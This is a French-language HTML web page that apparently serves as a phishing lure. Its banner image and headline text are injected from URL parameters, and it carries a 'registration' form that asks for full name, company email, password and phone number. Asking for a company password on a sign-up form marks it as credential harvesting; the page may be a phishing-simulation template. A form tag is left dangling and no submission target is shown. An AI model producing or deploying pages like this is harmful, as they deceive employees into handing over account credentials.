<html>
<head>
	<title></title>
	<style id="" type="text/css"><!--
    @import url("https://fonts.googleapis.com/css2?family=ABeeZee");

    
    -->
	</style>
	<style id="" type="text/css">
    #ddr-30fecc6521 h1,
    #ddr-30fecc6521 h2,
    #ddr-30fecc6521 h3,
    #ddr-30fecc6521 h4,
    #ddr-30fecc6521 h5,
    #ddr-30fecc6521 h6,
    #ddr-30fecc6521 p,
    #ddr-30fecc6521 span,
    #ddr-30fecc6521 a,
    #ddr-30fecc6521 .ddr-widget,
    #ddr-30fecc6521 .ddr-widget__form-label,
    #ddr-30fecc6521 .ddr-widget__form-submit button,
    #ddr-30fecc6521 .ddr-widget__form-label>div {
        color: undefined;
    }

    #ddr-96449b2778 h1,
    #ddr-96449b2778 h2,
    #ddr-96449b2778 h3,
    #ddr-96449b2778 h4,
    #ddr-96449b2778 h5,
    #ddr-96449b2778 h6,
    #ddr-96449b2778 p,
    #ddr-96449b2778 span,
    #ddr-96449b2778 a,
    #ddr-96449b2778 .ddr-widget,
    #ddr-96449b2778 .ddr-widget__form-label,
    #ddr-96449b2778 .ddr-widget__form-submit button,
    #ddr-96449b2778 .ddr-widget__form-label>div {
        color: undefined;
    }

    #ddr-89a1d48559 h1,
    #ddr-89a1d48559 h2,
    #ddr-89a1d48559 h3,
    #ddr-89a1d48559 h4,
    #ddr-89a1d48559 h5,
    #ddr-89a1d48559 h6,
    #ddr-89a1d48559 p,
    #ddr-89a1d48559 span,
    #ddr-89a1d48559 a,
    #ddr-89a1d48559 .ddr-widget,
    #ddr-89a1d48559 .ddr-widget__form-label,
    #ddr-89a1d48559 .ddr-widget__form-submit button,
    #ddr-89a1d48559 .ddr-widget__form-label>div {
        color: undefined;
    }

    #ddr-b082e24460 h1,
    #ddr-b082e24460 h2,
    #ddr-b082e24460 h3,
    #ddr-b082e24460 h4,
    #ddr-b082e24460 h5,
    #ddr-b082e24460 h6,
    #ddr-b082e24460 p,
    #ddr-b082e24460 span,
    #ddr-b082e24460 a,
    #ddr-b082e24460 .ddr-widget,
    #ddr-b082e24460 .ddr-widget__form-label,
    #ddr-b082e24460 .ddr-widget__form-submit button,
    #ddr-b082e24460 .ddr-widget__form-label>div {
        color: undefined;
    }

    #ddr-59153c8ab6 h1,
    #ddr-59153c8ab6 h2,
    #ddr-59153c8ab6 h3,
    #ddr-59153c8ab6 h4,
    #ddr-59153c8ab6 h5,
    #ddr-59153c8ab6 h6,
    #ddr-59153c8ab6 p,
    #ddr-59153c8ab6 span,
    #ddr-59153c8ab6 a,
    #ddr-59153c8ab6 .ddr-widget,
    #ddr-59153c8ab6 .ddr-widget__form-label,
    #ddr-59153c8ab6 .ddr-widget__form-submit button,
    #ddr-59153c8ab6 .ddr-widget__form-label>div {
        color: undefined;
    }

    #ddr-b8044fe599 h1,
    #ddr-b8044fe599 h2,
    #ddr-b8044fe599 h3,
    #ddr-b8044fe599 h4,
    #ddr-b8044fe599 h5,
    #ddr-b8044fe599 h6,
    #ddr-b8044fe599 p,
    #ddr-b8044fe599 span,
    #ddr-b8044fe599 a,
    #ddr-b8044fe599 .ddr-widget,
    #ddr-b8044fe599 .ddr-widget__form-label,
    #ddr-b8044fe599 .ddr-widget__form-submit button,
    #ddr-b8044fe599 .ddr-widget__form-label>div {
        color: undefined;
    }

    .ddr-page-wrapper * {
        box-sizing: border-box;
    }

    .ddr-page-wrapper {
        font-family: sans-serif;
        margin: 0px;
        padding: 0px;
        position: relative;
    }

    .ddr-page-wrapper .ddr-page-wrapper {
        min-height: auto;
    }

    .ddr-page-wrapper .ddr-page {
        position: relative;
    }

    .ddr-page-wrapper .ddr-page .ddr-page-section-pre-content::after,
    .ddr-page-wrapper .ddr-page .ddr-page-section-pre-content::before,
    .ddr-page-wrapper .ddr-page>div::after,
    .ddr-page-wrapper .ddr-page>div::before {
        clear: both;
        content: "";
        display: table;
    }

    .big-loader-wrapper {
        align-items: center;
        background: rgba(211, 210, 210, 0.5);
        display: flex;
        height: 150px;
        justify-content: center;
        position: relative;
        width: 100%;
        z-index: 1;
    }

    .big-loader-wrapper .big-loader {
        animation: 1s ease 0s infinite normal none running spin;
        background-color: rgba(255, 255, 255, 0.1);
        border-color: rgb(1, 154, 149) rgb(226, 118, 37);
        border-radius: 50%;
        border-style: solid;
        border-width: 3px;
        display: block;
        height: 64px;
        padding-top: 20px;
        width: 64px;
    }

    .ddr-page-row,
    .ddr-page-section-wrapper .ddr-page-section {
        box-sizing: border-box;
        position: relative;
    }

    .ddr-page-row {
        display: flex;
        width: 100%;
    }

    .ddr-page-row.ddr-widget-group-row.ddr-page-row__wrap {
        flex-wrap: wrap;
    }

    .ddr-page-row.ddr-widget-group-row.ddr-page-row__wrap .ddr-page-column-and-column-suggestion-wrapper {
        width: 100% !important;
    }

    .ddr-page-row__wrap {
        flex-wrap: wrap;
    }

    .ddr-page-row__wrap .ddr-page-column__wrap {
        width: 100% !important;
    }

    .ddr-page-row__wrap-reverse {
        flex-wrap: wrap-reverse;
    }

    .ddr-page-row__wrap-reverse .ddr-page-column__wrap-reverse {
        width: 100% !important;
    }

    .ddr-page-column {
        align-content: flex-start;
        box-sizing: border-box;
        display: flex;
        flex-wrap: wrap;
        position: relative;
    }

    @media screen and (max-width: 320px) {
        .widget-group.wrap--320>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--320>div .ddr-page-column {
            width: 100% !important;
        }
    }

    @media screen and (min-width: 321px) and (max-width: 480px) {
        .widget-group.wrap--480>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--480>div .ddr-page-column {
            width: 100% !important;
        }
    }

    @media screen and (min-width: 481px) and (max-width: 768px) {
        .widget-group.wrap--768>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--768>div .ddr-page-column {
            width: 100% !important;
        }
    }

    @media screen and (min-width: 769px) and (max-width: 1024px) {
        .widget-group.wrap--1024>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--1024>div .ddr-page-column {
            width: 100% !important;
        }
    }

    @media screen and (min-width: 1025px) and (max-width: 1280px) {
        .widget-group.wrap--1280>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--1280>div .ddr-page-column {
            width: 100% !important;
        }
    }

    @media only screen and (min-width: 1281px) {
        .widget-group.wrap--max>div {
            flex-direction: column !important;
        }

        .widget-group.wrap--max>div .ddr-page-column {
            width: 100% !important;
        }
    }

    .ddr-page-widget {
        position: relative;
        width: 100%;
    }

    .ddr-page-widget.ddr-page-widget__generic-collection-slider {
        overflow: visible !important;
    }

    .dashed-border {
        outline: rgb(135, 135, 135) dashed 1px;
    }

    .headline-edit-wrapper {
        cursor: text;
    }

    .separator {
        margin: 33px 0px;
        position: relative;
        width: 100%;
    }

    .separatorIcon {
        height: 45px;
        left: 50%;
        margin-left: -18px;
        padding: 10px;
        position: absolute;
        top: 16px;
    }

    .ddr-page-widget__navigation {
        overflow: visible !important;
    }

    .ddr-page-widget__navigation .ddr-widget {
        overflow: visible;
    }

    .ddr-page-widget__navigation .ddr-widget .menu>ul>li {
        position: relative;
    }

    .ddr-page-widget__navigation .menu>ul>li {
        margin-bottom: 0px;
        position: relative;
    }

    .ddr-page-widget__navigation .menu li ul {
        padding-bottom: 0px;
        width: 100%;
        z-index: 99;
        position: absolute !important;
    }

    .section-slider .ddr-page-section-widget-drop-suggestion-wrapper {
        padding-bottom: 7px;
    }

    .ddr-page-widget__sections-slider .toolbox-controls {
        justify-content: flex-start !important;
    }

    .section-slider-header-options {
        align-items: center;
        display: flex;
        justify-content: space-between;
        left: 20px;
        position: absolute;
        top: 1px;
        width: calc(100% - 20px);
    }

    .section-slider-header-options .fa.fa-copy {
        margin-right: 7px;
        position: static;
        transition: all 0.3s ease 0s;
        z-index: 100;
    }

    .section-slider-header-options .fa.fa-copy:hover {
        color: rgb(239, 83, 80);
    }

    .slide-options-wrapper {
        border-bottom: 1px solid rgb(226, 118, 37);
        position: relative;
    }

    .slide-options-wrapper .rc-collapse-header {
        align-items: center;
        display: flex;
    }

    .slide-options-wrapper .rc-collapse-content-active {
        background-color: rgb(23, 23, 23);
        overflow: visible;
    }

    .slide-options-wrapper .rc-collapse-content-active .custom-color-picker {
        left: -35px;
    }

    .slide-options-wrapper .rc-collapse-content-active .section-slider-delete-icon.slide-delete-icon {
        align-items: center;
        background: rgb(239, 83, 80);
        border-radius: 3px;
        color: rgb(255, 255, 255);
    }

    .slide-options-wrapper .rc-collapse-content-active .section-slider-delete-icon.slide-delete-icon i {
        color: rgb(255, 255, 255) !important;
    }

    .slide-options-wrapper .rc-collapse-content-active .switch-wrapper .switch {
        margin-left: -10px;
    }

    .slide-options-wrapper:last-child {
        margin-bottom: 24px;
    }

    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__sub-tool--drag,
    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__sub-tool--duplicate,
    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool--drag,
    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool--duplicate,
    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool--move,
    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool--settings {
        background-color: rgb(226, 118, 37);
    }

    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool--delete {
        background-color: rgb(72, 72, 72);
    }

    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool.ddr-widget-toolbox__tool--delete:hover {
        background-color: rgb(58, 65, 74);
    }

    .ddr-widget-toolbox--section-slider .toolbox-controls .ddr-widget-toolbox__tool:hover {
        background-color: rgb(239, 56, 27);
    }

    .ddr-page-widget-overlay-wrapper:hover .ddr-widget-toolbox--section-slider {
        border: 2px solid rgb(226, 118, 37) !important;
    }

    .ddr-widget-toolbox--active.ddr-widget-toolbox--section-slider {
        border: 2px solid rgb(226, 118, 37);
    }

    .uploadcare--widget__button {
        border-radius: 3px;
        border-style: solid;
        height: auto;
        margin-left: 7px;
        min-width: 0px;
        padding: 0.4em 1em;
        width: auto;
    }

    .ddr-widget {
        background-color: initial;
        background-image: none;
        inset: auto;
        height: auto;
        margin: 0px;
        max-height: none;
        max-width: none;
        min-height: 0px;
        min-width: 0px;
        padding: 0px;
        width: auto;
    }

    .ddr-widget__image {
        display: flex;
        height: auto;
        margin: auto;
        max-width: 100%;
        position: relative;
    }

    .ddr-widget__image a,
    .ddr-widget__image img {
        display: block;
        max-height: 100%;
        max-width: 100%;
        overflow: hidden;
        width: 100%;
    }

    .ddr-widget__image a,
    .ddr-widget__image a:active,
    .ddr-widget__image a:focus,
    .ddr-widget__image a:hover,
    .ddr-widget__image a:link,
    .ddr-widget__image a:visited {
        border: none;
        box-shadow: none;
        color: inherit;
        display: inline-block;
        position: relative;
        text-decoration: none;
        vertical-align: middle;
    }

    .ddr-widget__headline {
        position: relative;
        word-break: break-word;
    }

    .ddr-widget__button {
        display: flex;
        position: relative;
    }

    .ddr-widget__button a {
        overflow: hidden;
    }

    .ddr-widget__button a,
    .ddr-widget__button a:active,
    .ddr-widget__button a:focus,
    .ddr-widget__button a:hover,
    .ddr-widget__button a:link,
    .ddr-widget__button a:visited {
        border: none;
        box-shadow: none;
        color: inherit;
        display: inline-block;
        text-decoration: none;
        vertical-align: middle;
    }

    .ddr-widget__form-wrapper .ddr-widget__form {
        display: flex;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-label {
        align-items: center;
        display: flex;
        font-weight: 700;
        overflow: hidden;
        width: 30%;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-label>div {
        margin-bottom: 5px;
        margin-right: 5px;
        margin-top: 5px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form .input-full-width {
        width: 100%;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-value {
        display: flex;
        position: relative;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-value .input-resize-handle {
        background-color: rgba(232, 232, 232, 0.38);
        cursor: col-resize;
        height: 100%;
        padding: 0px;
        width: 1px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-value .input-resize-container {
        border: 1px dashed rgb(72, 72, 72);
        height: 100%;
        left: 0px;
        position: absolute;
        top: 0px;
        width: 55vw;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-value>div,
    .ddr-widget__form-wrapper .ddr-widget__form-value>input {
        padding: 4px 3px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-value>input,
    .ddr-widget__form-wrapper .ddr-widget__form-value>select,
    .ddr-widget__form-wrapper .ddr-widget__form-value>textarea {
        border: 1px solid rgb(169, 169, 169);
        font-family: sans-serif;
        max-width: 100%;
        padding: 4px 3px;
        width: 250px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-right .ddr-widget__form-label {
        justify-content: flex-end;
        padding-right: 15px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-left .ddr-widget__form-label {
        justify-content: flex-start;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-top {
        flex-direction: column;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-top .ddr-widget__form-label,
    .ddr-widget__form-wrapper .ddr-widget__form-top .ddr-widget__form-value {
        width: 100%;
    }

    @media (max-width: 480px) {
        .ddr-widget__form-wrapper .ddr-widget__form {
            flex-direction: column;
        }

        .ddr-widget__form-wrapper .ddr-widget__form-label,
        .ddr-widget__form-wrapper .ddr-widget__form-value,
        .ddr-widget__form-wrapper .ddr-widget__form-value>input,
        .ddr-widget__form-wrapper .ddr-widget__form-value>select,
        .ddr-widget__form-wrapper .ddr-widget__form-value>textarea {
            width: 100%;
        }
    }

    .ddr-widget__form-wrapper .ddr-widget__form-textarea textarea {
        resize: both;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-single-choice-option-wrapper {
        flex-direction: column;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-single-choice-option {
        margin-bottom: 5px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-multiple-choice-option-wrapper {
        flex-direction: column;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-multiple-choice-option {
        margin-bottom: 5px;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-submit {
        display: flex;
        position: relative;
    }

    .ddr-widget__form-wrapper .ddr-widget__form-submit button {
        box-shadow: none;
        box-sizing: border-box;
        cursor: pointer;
        display: block;
        overflow: hidden;
        transition: all 0.5s ease 0s;
        word-break: break-all;
    }

    .ddr-widget__gallery img[src=""] {
        display: none;
    }

    @media (min-width: 1281px) {
        .ddr-page-row__wrap--max {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--max .ddr-page-column__wrap--max {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--max {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--max .ddr-page-column__wrap-reverse--max {
            width: 100% !important;
        }

        .ddr-page-column__hide--max,
        .ddr-page-widget__hide--max {
            display: none;
        }
    }

    @media (max-width: 1280px) and (min-width: 1025px) {
        .ddr-page-row__wrap--1280 {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--1280 .ddr-page-column__wrap--1280 {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--1280 {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--1280 .ddr-page-column__wrap-reverse--1280 {
            width: 100% !important;
        }

        .ddr-page-column__hide--1280,
        .ddr-page-widget__hide--1280 {
            display: none;
        }
    }

    @media (max-width: 1024px) and (min-width: 769px) {
        .ddr-page-row__wrap--1024 {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--1024 .ddr-page-column__wrap--1024 {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--1024 {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--1024 .ddr-page-column__wrap-reverse--1024 {
            width: 100% !important;
        }

        .ddr-page-column__hide--1024,
        .ddr-page-widget__hide--1024 {
            display: none;
        }
    }

    @media (max-width: 768px) and (min-width: 481px) {
        .ddr-page-row__wrap--768 {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--768 .ddr-page-column__wrap--768 {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--768 {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--768 .ddr-page-column__wrap-reverse--768 {
            width: 100% !important;
        }

        .ddr-page-column__hide--768,
        .ddr-page-widget__hide--768 {
            display: none;
        }
    }

    @media (max-width: 480px) and (min-width: 321px) {
        .ddr-page-row__wrap--480 {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--480 .ddr-page-column__wrap--480 {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--480 {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--480 .ddr-page-column__wrap-reverse--480 {
            width: 100% !important;
        }

        .ddr-page-column__hide--480,
        .ddr-page-widget__hide--480 {
            display: none;
        }
    }

    @media (max-width: 320px) and (min-width: 0px) {
        .ddr-page-row__wrap--320 {
            flex-wrap: wrap;
        }

        .ddr-page-row__wrap--320 .ddr-page-column__wrap--320 {
            width: 100% !important;
        }

        .ddr-page-row__wrap-reverse--320 {
            flex-wrap: wrap-reverse;
        }

        .ddr-page-row__wrap-reverse--320 .ddr-page-column__wrap-reverse--320 {
            width: 100% !important;
        }

        .ddr-page-column__hide--320,
        .ddr-page-widget__hide--320 {
            display: none;
        }
    }

    .ddr-page-wrapper {
        font-family: 'Courier New', monospace !important;
    }

    .ddr-page-widget[data-ddr-page-widget-additional-css-id="432605890e"] .ddr-widget h1 {
        font-family: 'Arial Black', sans-serif !important;
    }

    .ddr-page-widget[data-ddr-page-widget-additional-css-id="705ec576ca"] .ddr-widget h1 {
        font-family: 'ABeeZee', sans-serif !important;
    }

    .ddr-page-widget[data-ddr-page-widget-additional-css-id="c83e73c40f"] .ddr-widget h1 {
        font-family: 'ABeeZee', sans-serif !important;
    }

    .ddr-page-widget[data-ddr-page-widget-additional-css-id="4a9bff846c"] .ddr-widget h1 {
        font-family: 'ABeeZee', sans-serif !important;
    }

    #button-5000 {
        color: #ffffff;
    }

    #button-5000:hover {
        background-color: #097c82 !important;
        border-color: #097c82;
    }

    #button-5000:hover {}

    #button-5000 {
        color: #ffffff;
    }

    #button-5000:hover {
        background-color: #097c82 !important;
        border-color: #097c82;
    }

    #button-5000:hover {}

    
    
	</style>
	<style id="project-styles" type="text/css">
    #ddr-button-56dd2beed7 .ddr-widget__button-input {
        color: #ffffff;
    }

    #ddr-button-56dd2beed7:hover {
        background-color: #097c82 !important;
        border-color: #097c82;
    }

    #ddr-button-56dd2beed7:hover .ddr-widget__button-input {}

    .ddr-widget .ddr-widget__button>a>button,
    .ddr-widget .ddr-widget__form-text-input .uploadcare-button,
    .ddr-widget .uploadcare--widget__button,
    .ddr-widget .ddr-widget__form-submit button {
        overflow: hidden;
        cursor: pointer;
        background-color: #008fa2;
        box-sizing: border-box;
        word-break: break-word;
        transition: all .5s ease;
        border: none;
        border-radius: 3px;
    }

    .ddr-widget .ddr-widget__form-text-input .uploadcare-button {
        color: white;
    }

    .editor-wrapper .ddr-page-wrapper .ddr-widget .ddr-widget__rich-text .mce-content-body {
        line-height: unset;
    }

    .ddr-widget .ddr-widget__button>a>button,
    .ddr-widget .ddr-widget__form-text-input .uploadcare-button,
    .ddr-widget .ddr-widget__form-submit button {
        display: block;
    }

    .ddr-widget .ddr-widget__button>a>button span {
        font-size: 18px;
    }

    .ddr-widget .ddr-widget__countdown-widget {
        text-align: center;
        font-size: 35px;
    }

    .ddr-widget .ddr-widget__countdown-widget .countdown-label {
        font-size: 20px;
    }

    .generic-collection__item-DefaultStyle,
    .generic-collection__item-Style1,
    .generic-collection__item-Style2 {
        font-size: 14px;
        color: #107e8e;
        font-weight: 700;
    }

    .generic-collection__description {
        color: #343a40;
    }

    
    -->
	</style>
	<script class="dd-uploadcare-script">
    
    </script><script type="text/javascript">
   
    </script>
</head>
<body>

    <div id="image-container">
        <img id="image" style="height: auto; width: 100%;justify-content: center; margin-bottom: -6px; margin-top: -30px; overflow: hidden;" >
      </div>
      
      <script>
        const urlParams = new URLSearchParams(window.location.search);
        const keyword = urlParams.get('keyword');
        const url = urlParams.get('url');
        const img = document.getElementById('image');
        img.src = url;
      </script>


<div class="ddr-page-section ddr-page-section-1" style="background-color: rgb(5 5 5); margin-bottom: -4px; display: flow-root;">
    <p id="resultText"  style="margin: 45px 94px 146px; color: #ffffff; text-align: center; padding-top: 138px; font-size: 51px;" ></p>
    <script>
      var queryString = window.location.search;
      var urlParams2 = new URLSearchParams(queryString);
      var text = urlParams2.get('text');
      document.getElementById("resultText").textContent = text;
    </script>
     

</div>

      


      


<div class="ddr-page-section-wrapper ddr-page-section-wrapper-3" id="ddr-b082e24460">
<div class="ddr-page-section-pre-content ddr-page-section-pre-content-3 ">
<div class="ddr-page-section ddr-page-section-3" style="display: flow-root;">
<div class="ddr-page-row ddr-page-row-0 ddr-page-row__wrap--320 ddr-page-row__wrap--480 ddr-page-row__wrap--768" id="ddr-bd8590b637">
<div class="ddr-page-column ddr-page-column-0 ddr-page-column__wrap--320 ddr-page-column__wrap--480 ddr-page-column__wrap--768 " id="ddr-1b28234d82" style="width: 100%;">
<div class="ddr-page-widget ddr-page-widget__image ddr-page-widget-0 " id="ddr-3e335b69cb">
<div class="ddr-widget ">
<div class="ddr-widget__image" style="justify-content: center; margin-top: -5px; margin-right: -12px; margin-left: 0px; padding-right: 1px; overflow: hidden;">
    <a style="width: 1538px; height: 686.372px; max-height: unset; min-height: unset; min-width: 60px; max-width: unset;" target="_self"><img src="stb-une.jpg" 
    style="height: auto; width: 100%;justify-content: center; margin-bottom: -6px; margin-top: -30px; overflow: hidden;" /></a></div>
</div>
</div>

<div class="ddr-page-widget ddr-page-widget__headline ddr-page-widget-1 " data-ddr-page-widget-additional-css-id="c83e73c40f" id="ddr-585aee6686">
<div class="ddr-widget ">
<h1 class="ddr-widget__headline" style="margin: -383px 16px 15px 32px; font-size: 43px; text-align: center; color: rgb(255, 255, 255); background-position: center center; padding-top: 8px;"><span style="background-color: initial;"></span></h1>

<p>&nbsp;</p>

<p>&nbsp;</p>

<p>&nbsp;</p>
</div>
</div>
</div>
</div>
</div>
</div>
</div>



<div class="ddr-widget ">
<h1 class="ddr-widget__headline" style="margin: 9px 15px 89px; text-align: center; padding-top: 48px; padding-bottom: 15px;">Si vous &ecirc;tes int&eacute;ress&eacute;, veuillez vous inscrire en remplissant le formulaire:</h1>


</div>
</div>


<style type="text/css">
   
      
      label {
        display: block;
        margin-bottom: 5px;
        font-weight: bold;
        font-size: 16px;
      }
      
      input[type="text"],
      input[type="password"],
      input[type="email"],
      input[type="tel"] {
        width: 50%;
        
        margin: 10px auto 30px;
        border: 1px solid #ccc;
        border-radius: 5px;
        box-shadow: inset 0px 0px 5px rgba(0,0,0,0.1);
        font-size: 16px;
        color: #555;
        display: block;
      }
      
      input[type="text"]:focus,
      input[type="password"]:focus,
      input[type="email"]:focus,
      input[type="tel"]:focus {
        border-color: #a0c3e7;
        box-shadow: 0 0 5px #a0c3e7;
        outline: none;
        margin: 23px auto 188px;
      }
      
      input[type="submit"] {
        background-color: rgb(8 142 216);
        margin: 20px auto;
        color: white;
        
        border: none;
        border-radius: 5px;
        cursor: pointer;
        display: block;
      }
      
      input[type="submit"]:hover {
        background-color: #5576b5;
      }
      
      input[type="submit"]:focus {
        outline: none;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.5);
      }

</style>

<div class="ddr-page-section ddr-page-section-1" style="background-color: rgb(5 5 5); margin: 0 auto; width: 100%; display: flow-root;">
    <label style="margin: 101px 0 10px; color: #f9f6f6; text-align: center; font-size: 29px;">Nom Complet:</label>
    <input name="username" type="text" style="display: block; margin: 0 auto; padding: 10px; font-size: 20px; border: none; border-radius: 5px;" />
    <label style="margin: 20px 0 10px; color: #f9f6f6; text-align: center;  font-size: 29px;">Email de la société:</label>
    <input name="email" type="email" style="display: block; margin: 0 auto; padding: 10px; font-size: 20px; border: none; border-radius: 5px;" />
    <label style="margin: 20px 0 10px; color: #f9f6f6; text-align: center;font-size: 29px;">Mot de passe :</label>
    <input name="password" type="password" style="display: block; margin: 0 auto; padding: 10px; font-size: 20px; border: none; border-radius: 5px;" />
    <label style="margin: 20px 0 10px; color: #f9f6f6; text-align: center;font-size: 29px;">Numéro de téléphone:</label>
    <input name="tel" type="tel" style="display: block; margin: 0 auto; padding: 10px; font-size: 20px; border: none; border-radius: 5px;" />
    <input id="login" name="login" type="submit" value="Envoyer" style="display: block; margin:38px auto 41px; padding: 10px; font-size: 20px; border: none; border-radius: 5px; color: #fff;" />
  </div>
</div></div>
</form>








</body>
</html>
